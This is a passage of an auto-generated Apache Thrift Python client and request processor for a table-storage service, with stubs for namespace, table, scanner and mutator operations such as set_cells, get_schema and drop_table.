Alternative interface using array as cell
Parameters:
- mutator
- cell
"""
self.send_set_cell_as_array(mutator, cell)
self.recv_set_cell_as_array()
def send_set_cell_as_array(self, mutator, cell):
self._oprot.writeMessageBegin('set_cell_as_array', TMessageType.CALL, self._seqid)
args = set_cell_as_array_args()
args.mutator = mutator
args.cell = cell
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_set_cell_as_array(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = set_cell_as_array_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def set_cells(self, mutator, cells):
"""
Put a list of cells into a table
@param mutator - mutator id
@param cells - a list of cells (a cell with no row key set is assumed
to have the same row key as the previous cell)
Parameters:
- mutator
- cells
"""
self.send_set_cells(mutator, cells)
self.recv_set_cells()
def send_set_cells(self, mutator, cells):
self._oprot.writeMessageBegin('set_cells', TMessageType.CALL, self._seqid)
args = set_cells_args()
args.mutator = mutator
args.cells = cells
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_set_cells(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = set_cells_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def set_cells_as_arrays(self, mutator, cells):
"""
Alternative interface using array as cell
Parameters:
- mutator
- cells
"""
self.send_set_cells_as_arrays(mutator, cells)
self.recv_set_cells_as_arrays()
def send_set_cells_as_arrays(self, mutator, cells):
self._oprot.writeMessageBegin('set_cells_as_arrays', TMessageType.CALL, self._seqid)
args = set_cells_as_arrays_args()
args.mutator = mutator
args.cells = cells
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_set_cells_as_arrays(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = set_cells_as_arrays_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def set_cells_serialized(self, mutator, cells, flush):
"""
Alternative interface using buffer of serialized cells
Parameters:
- mutator
- cells
- flush
"""
self.send_set_cells_serialized(mutator, cells, flush)
self.recv_set_cells_serialized()
def send_set_cells_serialized(self, mutator, cells, flush):
self._oprot.writeMessageBegin('set_cells_serialized', TMessageType.CALL, self._seqid)
args = set_cells_serialized_args()
args.mutator = mutator
args.cells = cells
args.flush = flush
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_set_cells_serialized(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = set_cells_serialized_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def flush_mutator(self, mutator):
"""
Flush mutator buffers
Parameters:
- mutator
"""
self.send_flush_mutator(mutator)
self.recv_flush_mutator()
def send_flush_mutator(self, mutator):
self._oprot.writeMessageBegin('flush_mutator', TMessageType.CALL, self._seqid)
args = flush_mutator_args()
args.mutator = mutator
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_flush_mutator(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = flush_mutator_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def exists_namespace(self, ns):
"""
Check if the namespace exists
@param ns - namespace name
@return true if ns exists, false ow
Parameters:
- ns
"""
self.send_exists_namespace(ns)
return self.recv_exists_namespace()
def send_exists_namespace(self, ns):
self._oprot.writeMessageBegin('exists_namespace', TMessageType.CALL, self._seqid)
args = exists_namespace_args()
args.ns = ns
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_exists_namespace(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = exists_namespace_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "exists_namespace failed: unknown result");
def exists_table(self, ns, name):
"""
Check if the table exists
@param ns - namespace id
@param name - table name
@return true if table exists, false ow
Parameters:
- ns
- name
"""
self.send_exists_table(ns, name)
return self.recv_exists_table()
def send_exists_table(self, ns, name):
self._oprot.writeMessageBegin('exists_table', TMessageType.CALL, self._seqid)
args = exists_table_args()
args.ns = ns
args.name = name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_exists_table(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = exists_table_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "exists_table failed: unknown result");
def get_table_id(self, ns, table_name):
"""
Get the id of a table
@param ns - namespace id
@param table_name - table name
@return table id string
Parameters:
- ns
- table_name
"""
self.send_get_table_id(ns, table_name)
return self.recv_get_table_id()
def send_get_table_id(self, ns, table_name):
self._oprot.writeMessageBegin('get_table_id', TMessageType.CALL, self._seqid)
args = get_table_id_args()
args.ns = ns
args.table_name = table_name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_table_id(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_table_id_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_table_id failed: unknown result");
def get_schema_str(self, ns, table_name):
"""
Get the schema of a table as a string (that can be used with create_table)
@param ns - namespace id
@param table_name - table name
@return schema string (in xml)
Parameters:
- ns
- table_name
"""
self.send_get_schema_str(ns, table_name)
return self.recv_get_schema_str()
def send_get_schema_str(self, ns, table_name):
self._oprot.writeMessageBegin('get_schema_str', TMessageType.CALL, self._seqid)
args = get_schema_str_args()
args.ns = ns
args.table_name = table_name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_schema_str(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_schema_str_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_schema_str failed: unknown result");
def get_schema(self, ns, table_name):
"""
Get the schema of a table as a string (that can be used with create_table)
@param ns - namespace id
@param table_name - table name
@return schema object describing a table
Parameters:
- ns
- table_name
"""
self.send_get_schema(ns, table_name)
return self.recv_get_schema()
def send_get_schema(self, ns, table_name):
self._oprot.writeMessageBegin('get_schema', TMessageType.CALL, self._seqid)
args = get_schema_args()
args.ns = ns
args.table_name = table_name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_schema(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_schema_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_schema failed: unknown result");
def get_tables(self, ns):
"""
Get a list of table names in the namespace
@param ns - namespace id
@return a list of table names
Parameters:
- ns
"""
self.send_get_tables(ns)
return self.recv_get_tables()
def send_get_tables(self, ns):
self._oprot.writeMessageBegin('get_tables', TMessageType.CALL, self._seqid)
args = get_tables_args()
args.ns = ns
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_tables(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_tables_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_tables failed: unknown result");
def get_listing(self, ns):
"""
Get a list of namespaces and table names table names in the namespace
@param ns - namespace
@return a list of table names
Parameters:
- ns
"""
self.send_get_listing(ns)
return self.recv_get_listing()
def send_get_listing(self, ns):
self._oprot.writeMessageBegin('get_listing', TMessageType.CALL, self._seqid)
args = get_listing_args()
args.ns = ns
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_listing(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_listing_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_listing failed: unknown result");
def get_table_splits(self, ns, table_name):
"""
Get a list of table splits
@param ns - namespace id
@param table_name - table name
@return a list of table names
Parameters:
- ns
- table_name
"""
self.send_get_table_splits(ns, table_name)
return self.recv_get_table_splits()
def send_get_table_splits(self, ns, table_name):
self._oprot.writeMessageBegin('get_table_splits', TMessageType.CALL, self._seqid)
args = get_table_splits_args()
args.ns = ns
args.table_name = table_name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_table_splits(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_table_splits_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
if result.e != None:
raise result.e
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_table_splits failed: unknown result");
def drop_namespace(self, ns, if_exists):
"""
Drop a namespace
@param ns - namespace name
@param if_exists - if true, don't barf if the table doesn't exist
Parameters:
- ns
- if_exists
"""
self.send_drop_namespace(ns, if_exists)
self.recv_drop_namespace()
def send_drop_namespace(self, ns, if_exists):
self._oprot.writeMessageBegin('drop_namespace', TMessageType.CALL, self._seqid)
args = drop_namespace_args()
args.ns = ns
args.if_exists = if_exists
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_drop_namespace(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = drop_namespace_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def rename_table(self, ns, name, new_name):
"""
Rename a table
@param ns - namespace id
@param name - current table name
@param new_name - new table name
Parameters:
- ns
- name
- new_name
"""
self.send_rename_table(ns, name, new_name)
self.recv_rename_table()
def send_rename_table(self, ns, name, new_name):
self._oprot.writeMessageBegin('rename_table', TMessageType.CALL, self._seqid)
args = rename_table_args()
args.ns = ns
args.name = name
args.new_name = new_name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_rename_table(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = rename_table_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
def drop_table(self, ns, name, if_exists):
"""
Drop a table
@param ns - namespace id
@param name - table name
@param if_exists - if true, don't barf if the table doesn't exist
Parameters:
- ns
- name
- if_exists
"""
self.send_drop_table(ns, name, if_exists)
self.recv_drop_table()
def send_drop_table(self, ns, name, if_exists):
self._oprot.writeMessageBegin('drop_table', TMessageType.CALL, self._seqid)
args = drop_table_args()
args.ns = ns
args.name = name
args.if_exists = if_exists
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_drop_table(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = drop_table_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.e != None:
raise result.e
return
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["create_namespace"] = Processor.process_create_namespace
self._processMap["create_table"] = Processor.process_create_table
self._processMap["open_namespace"] = Processor.process_open_namespace
self._processMap["close_namespace"] = Processor.process_close_namespace
self._processMap["open_scanner"] = Processor.process_open_scanner
self._processMap["close_scanner"] = Processor.process_close_scanner
self._processMap["next_cells"] = Processor.process_next_cells
self._processMap["next_cells_as_arrays"] = Processor.process_next_cells_as_arrays
self._processMap["next_cells_serialized"] = Processor.process_next_cells_serialized
self._processMap["next_row"] = Processor.process_next_row
self._processMap["next_row_as_arrays"] = Processor.process_next_row_as_arrays
self._processMap["next_row_serialized"] = Processor.process_next_row_serialized
self._processMap["get_row"] = Processor.process_get_row
self._processMap["get_row_as_arrays"] = Processor.process_get_row_as_arrays
self._processMap["get_row_serialized"] = Processor.process_get_row_serialized
self._processMap["get_cell"] = Processor.process_get_cell
self._processMap["get_cells"] = Processor.process_get_cells
self._processMap["get_cells_as_arrays"] = Processor.process_get_cells_as_arrays
self._processMap["get_cells_serialized"] = Processor.process_get_cells_serialized
self._processMap["refresh_shared_mutator"] = Processor.process_refresh_shared_mutator
self._processMap["offer_cells"] = Processor.process_offer_cells
self._processMap["offer_cells_as_arrays"] = Processor.process_offer_cells_as_arrays
self._processMap["offer_cell"] = Processor.process_offer_cell
self._processMap["offer_cell_as_array"] = Processor.process_offer_cell_as_array
self._processMap["open_mutator"] = Processor.process_open_mutator
self._processMap["close_mutator"] = Processor.process_close_mutator
self._processMap["set_cell"] = Processor.process_set_cell
self._processMap["set_cell_as_array"] = Processor.process_set_cell_as_array
self._processMap["set_cells"] = Processor.process_set_cells
self._processMap["set_cells_as_arrays"] = Processor.process_set_cells_as_arrays
self._processMap["set_cells_serialized"] = Processor.process_set_cells_serialized
self._processMap["flush_mutator"] = Processor.process_flush_mutator
self._processMap["exists_namespace"] = Processor.process_exists_namespace
self._processMap["exists_table"] = Processor.process_exists_table
self._processMap["get_table_id"] = Processor.process_get_table_id
self._processMap["get_schema_str"] = Processor.process_get_schema_str
self._processMap["get_schema"] = Processor.process_get_schema
self._processMap["get_tables"] = Processor.process_get_tables
self._processMap["get_listing"] = Processor.process_get_listing
self._processMap["get_table_splits"] = Processor.process_get_table_splits
self._processMap["drop_namespace"] = Processor.process_drop_namespace
self._processMap["rename_table"] = Processor.process_rename_table
self._processMap["drop_table"] = Processor.process_drop_table
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_create_namespace(self, seqid, iprot, oprot):
args = create_namespace_args()
args.read(iprot)
iprot.readMessageEnd()
result = create_namespace_result()
try:
self._handler.create_namespace(args.ns)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("create_namespace", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_create_table(self, seqid, iprot, oprot):
args = create_table_args()
args.read(iprot)
iprot.readMessageEnd()
result = create_table_result()
try:
self._handler.create_table(args.ns, args.table_name, args.schema)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("create_table", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_open_namespace(self, seqid, iprot, oprot):
args = open_namespace_args()
args.read(iprot)
iprot.readMessageEnd()
result = open_namespace_result()
try:
result.success = self._handler.open_namespace(args.ns)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("open_namespace", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_close_namespace(self, seqid, iprot, oprot):
args = close_namespace_args()
args.read(iprot)
iprot.readMessageEnd()
result = close_namespace_result()
try:
self._handler.close_namespace(args.ns)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("close_namespace", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_open_scanner(self, seqid, iprot, oprot):
args = open_scanner_args()
args.read(iprot)
iprot.readMessageEnd()
result = open_scanner_result()
try:
result.success = self._handler.open_scanner(args.ns, args.table_name, args.scan_spec, args.retry_table_not_found)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("open_scanner", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_close_scanner(self, seqid, iprot, oprot):
args = close_scanner_args()
args.read(iprot)
iprot.readMessageEnd()
result = close_scanner_result()
try:
self._handler.close_scanner(args.scanner)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("close_scanner", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_next_cells(self, seqid, iprot, oprot):
args = next_cells_args()
args.read(iprot)
iprot.readMessageEnd()
result = next_cells_result()
try:
result.success = self._handler.next_cells(args.scanner)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("next_cells", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_next_cells_as_arrays(self, seqid, iprot, oprot):
args = next_cells_as_arrays_args()
args.read(iprot)
iprot.readMessageEnd()
result = next_cells_as_arrays_result()
try:
result.success = self._handler.next_cells_as_arrays(args.scanner)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("next_cells_as_arrays", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_next_cells_serialized(self, seqid, iprot, oprot):
args = next_cells_serialized_args()
args.read(iprot)
iprot.readMessageEnd()
result = next_cells_serialized_result()
result.success = self._handler.next_cells_serialized(args.scanner)
oprot.writeMessageBegin("next_cells_serialized", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_next_row(self, seqid, iprot, oprot):
args = next_row_args()
args.read(iprot)
iprot.readMessageEnd()
result = next_row_result()
try:
result.success = self._handler.next_row(args.scanner)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("next_row", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_next_row_as_arrays(self, seqid, iprot, oprot):
args = next_row_as_arrays_args()
args.read(iprot)
iprot.readMessageEnd()
result = next_row_as_arrays_result()
try:
result.success = self._handler.next_row_as_arrays(args.scanner)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("next_row_as_arrays", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_next_row_serialized(self, seqid, iprot, oprot):
args = next_row_serialized_args()
args.read(iprot)
iprot.readMessageEnd()
result = next_row_serialized_result()
try:
result.success = self._handler.next_row_serialized(args.scanner)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("next_row_serialized", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_row(self, seqid, iprot, oprot):
args = get_row_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_row_result()
try:
result.success = self._handler.get_row(args.ns, args.table_name, args.row)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("get_row", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_row_as_arrays(self, seqid, iprot, oprot):
args = get_row_as_arrays_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_row_as_arrays_result()
try:
result.success = self._handler.get_row_as_arrays(args.ns, args.name, args.row)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("get_row_as_arrays", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_row_serialized(self, seqid, iprot, oprot):
args = get_row_serialized_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_row_serialized_result()
try:
result.success = self._handler.get_row_serialized(args.ns, args.table_name, args.row)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("get_row_serialized", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_cell(self, seqid, iprot, oprot):
args = get_cell_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_cell_result()
try:
result.success = self._handler.get_cell(args.ns, args.table_name, args.row, args.column)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("get_cell", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_cells(self, seqid, iprot, oprot):
args = get_cells_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_cells_result()
try:
result.success = self._handler.get_cells(args.ns, args.table_name, args.scan_spec)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("get_cells", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_cells_as_arrays(self, seqid, iprot, oprot):
args = get_cells_as_arrays_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_cells_as_arrays_result()
try:
result.success = self._handler.get_cells_as_arrays(args.ns, args.name, args.scan_spec)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("get_cells_as_arrays", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_cells_serialized(self, seqid, iprot, oprot):
args = get_cells_serialized_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_cells_serialized_result()
try:
result.success = self._handler.get_cells_serialized(args.ns, args.name, args.scan_spec)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("get_cells_serialized", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_refresh_shared_mutator(self, seqid, iprot, oprot):
args = refresh_shared_mutator_args()
args.read(iprot)
iprot.readMessageEnd()
result = refresh_shared_mutator_result()
try:
self._handler.refresh_shared_mutator(args.ns, args.table_name, args.mutate_spec)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("refresh_shared_mutator", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_offer_cells(self, seqid, iprot, oprot):
args = offer_cells_args()
args.read(iprot)
iprot.readMessageEnd()
result = offer_cells_result()
try:
self._handler.offer_cells(args.ns, args.table_name, args.mutate_spec, args.cells)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("offer_cells", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_offer_cells_as_arrays(self, seqid, iprot, oprot):
args = offer_cells_as_arrays_args()
args.read(iprot)
iprot.readMessageEnd()
result = offer_cells_as_arrays_result()
try:
self._handler.offer_cells_as_arrays(args.ns, args.table_name, args.mutate_spec, args.cells)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("offer_cells_as_arrays", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_offer_cell(self, seqid, iprot, oprot):
args = offer_cell_args()
args.read(iprot)
iprot.readMessageEnd()
result = offer_cell_result()
try:
self._handler.offer_cell(args.ns, args.table_name, args.mutate_spec, args.cell)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("offer_cell", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_offer_cell_as_array(self, seqid, iprot, oprot):
args = offer_cell_as_array_args()
args.read(iprot)
iprot.readMessageEnd()
result = offer_cell_as_array_result()
try:
self._handler.offer_cell_as_array(args.ns, args.table_name, args.mutate_spec, args.cell)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("offer_cell_as_array", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_open_mutator(self, seqid, iprot, oprot):
args = open_mutator_args()
args.read(iprot)
iprot.readMessageEnd()
result = open_mutator_result()
try:
result.success = self._handler.open_mutator(args.ns, args.table_name, args.flags, args.flush_interval)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("open_mutator", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_close_mutator(self, seqid, iprot, oprot):
args = close_mutator_args()
args.read(iprot)
iprot.readMessageEnd()
result = close_mutator_result()
try:
self._handler.close_mutator(args.mutator, args.flush)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("close_mutator", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_set_cell(self, seqid, iprot, oprot):
args = set_cell_args()
args.read(iprot)
iprot.readMessageEnd()
result = set_cell_result()
try:
self._handler.set_cell(args.mutator, args.cell)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("set_cell", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_set_cell_as_array(self, seqid, iprot, oprot):
args = set_cell_as_array_args()
args.read(iprot)
iprot.readMessageEnd()
result = set_cell_as_array_result()
try:
self._handler.set_cell_as_array(args.mutator, args.cell)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("set_cell_as_array", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_set_cells(self, seqid, iprot, oprot):
args = set_cells_args()
args.read(iprot)
iprot.readMessageEnd()
result = set_cells_result()
try:
self._handler.set_cells(args.mutator, args.cells)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("set_cells", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_set_cells_as_arrays(self, seqid, iprot, oprot):
args = set_cells_as_arrays_args()
args.read(iprot)
iprot.readMessageEnd()
result = set_cells_as_arrays_result()
try:
self._handler.set_cells_as_arrays(args.mutator, args.cells)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("set_cells_as_arrays", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_set_cells_serialized(self, seqid, iprot, oprot):
args = set_cells_serialized_args()
args.read(iprot)
iprot.readMessageEnd()
result = set_cells_serialized_result()
try:
self._handler.set_cells_serialized(args.mutator, args.cells, args.flush)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("set_cells_serialized", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_flush_mutator(self, seqid, iprot, oprot):
args = flush_mutator_args()
args.read(iprot)
iprot.readMessageEnd()
result = flush_mutator_result()
try:
self._handler.flush_mutator(args.mutator)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("flush_mutator", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_exists_namespace(self, seqid, iprot, oprot):
args = exists_namespace_args()
args.read(iprot)
iprot.readMessageEnd()
result = exists_namespace_result()
try:
result.success = self._handler.exists_namespace(args.ns)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("exists_namespace", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_exists_table(self, seqid, iprot, oprot):
args = exists_table_args()
args.read(iprot)
iprot.readMessageEnd()
result = exists_table_result()
try:
result.success = self._handler.exists_table(args.ns, args.name)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("exists_table", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_table_id(self, seqid, iprot, oprot):
args = get_table_id_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_table_id_result()
try:
result.success = self._handler.get_table_id(args.ns, args.table_name)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("get_table_id", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_schema_str(self, seqid, iprot, oprot):
args = get_schema_str_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_schema_str_result()
try:
result.success = self._handler.get_schema_str(args.ns, args.table_name)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("get_schema_str", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_schema(self, seqid, iprot, oprot):
args = get_schema_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_schema_result()
try:
result.success = self._handler.get_schema(args.ns, args.table_name)
except ClientException, e:
result.e = e
oprot.writeMessageBegin("get_schema", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
